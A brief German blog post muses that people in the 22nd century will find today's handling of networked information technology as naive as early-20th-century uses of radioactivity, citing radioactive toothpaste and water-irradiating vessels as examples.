Anfang des 22. Jahrhunderts wird man wohl auf unsere Zeit zurückblicken und sich wundern, wie naiv die Menschen mit vernetzter Informationstechnologie am Anfang des 21. Jahrhunderts umgegengen sind, genauso wie wir uns heute wundern, wie naiv Leute am Anfang des 20. Jahrhunderts mit der Radioaktivität umgegangen sind. Es gab damals beispielsweise radioaktive Zahnpasta und Gefäße, mit denen man das Trinkwasser verstrahlen konnte, damit es „gesünder“ würde…

Diese radioaktive Zahncreme wurde zwischen 1945 und 1950 verkauft…

Bloggen auf WordPress.com.